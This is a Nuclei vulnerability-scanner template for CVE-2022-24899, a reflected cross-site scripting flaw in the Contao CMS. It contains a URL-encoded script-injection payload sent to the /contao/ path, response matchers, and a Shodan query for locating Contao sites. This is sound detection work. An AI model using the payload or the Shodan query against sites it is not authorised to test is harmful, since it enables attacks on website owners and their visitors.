nuclei-templates/cves/2022/CVE-2022-24899.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2022-06-18 18:50:43 +00:00
id: CVE-2022-24899
info:
name: Contao 4.13.2 - Cross-Site Scripting (XSS)
author: ritikchaddha
severity: medium
2022-06-18 18:50:43 +00:00
description: |
Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
reference:
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://nvd.nist.gov/vuln/detail/CVE-2022-24899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24899
cwe-id: CWE-79
2022-06-18 18:50:43 +00:00
metadata:
shodan-query: title:"Contao"
tags: cve,cve2022,contao,xss,huntr
2022-06-18 18:50:43 +00:00
requests:
- method: GET
path:
2022-06-22 06:34:17 +00:00
- "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-06-18 18:50:43 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-06-22 06:34:17 +00:00
- '"></script><script>alert(document.domain)</script>'
2022-06-22 06:31:46 +00:00
- '"Not authenticated"'
condition: and
2022-06-18 18:50:43 +00:00
- type: word
part: header
words:
2022-06-22 06:31:46 +00:00
- text/html